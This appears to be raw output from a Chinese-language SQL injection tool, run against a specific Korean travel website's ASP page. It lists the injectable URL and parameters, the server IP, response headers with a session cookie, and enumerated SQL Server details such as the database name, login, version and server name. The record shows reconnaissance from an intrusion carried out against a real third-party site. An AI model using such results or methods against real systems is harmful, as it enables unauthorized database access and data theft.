■漏洞信息:============================================================
 ・URL:http://www.jjtour.co.kr/web/goods/jjtour/goods_person_view.asp?goods_type=%C6%D0%C5%B0%C1%F6&goods_area=%C0%FC%C3%BC&keyword=&hide_type=off&yyyy=&mm=&dd=&menu_id=75276&id=31373
 ・页面标题：老夯 咯青篮 力捞力捞捧绢客 窃膊~⑤
 ・参数:goods_type=%C6%D0%C5%B0%C1%F6&goods_area=%C0%FC%C3%BC&keyword=&hide_type=off&yyyy=&mm=&dd=&menu_id=75276&id=31373
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:211.108.62.146
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:38:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42310
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAACDSQQQ=MLEFPHCALJBPMFIAEGAGBDGE; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：Tour
- 用户名：netholdingsUser
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NS2
- 服务名：MSSQLSERVER
- 系统用户名：netholdingsUser

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
